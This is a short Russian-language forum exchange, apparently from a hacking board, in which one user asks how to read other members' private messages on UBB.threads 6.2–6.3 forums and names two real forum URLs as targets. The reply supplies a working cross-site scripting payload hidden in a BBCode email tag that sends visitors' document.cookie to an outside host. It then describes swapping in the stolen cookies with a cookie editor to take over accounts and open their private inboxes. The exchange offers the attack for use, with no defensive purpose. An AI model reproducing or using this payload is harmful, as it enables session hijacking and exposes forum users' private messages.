Hi ALL! Люди подскажите, как можно посмотреть приваты юзеров на форумах типа UBB.threads™ 6.2 или 6.3? Для примера приведу http://forum.isurgut.ru/ubbthreads.php?Cat= или http://www.autoua.net/auto_f/ubbthreads.php заранее спасибки my rspkt 2 u.
для http://forum.isurgut.ru : Есть уязвимость в теге </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>[b]Исходный код[/b] </td></tr><tr><td id="CODE">[email]"`/=`[email protected] ` style=`background:url("javascript:i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")` [/QUOTE]<span id='postcolor'> Получаем куки, заменяем их у себя в браузере (например програмкой CookieEditor, качать здесь http://antichat.ru/progs.shtml ), получаем доступ к приватным ящикам.
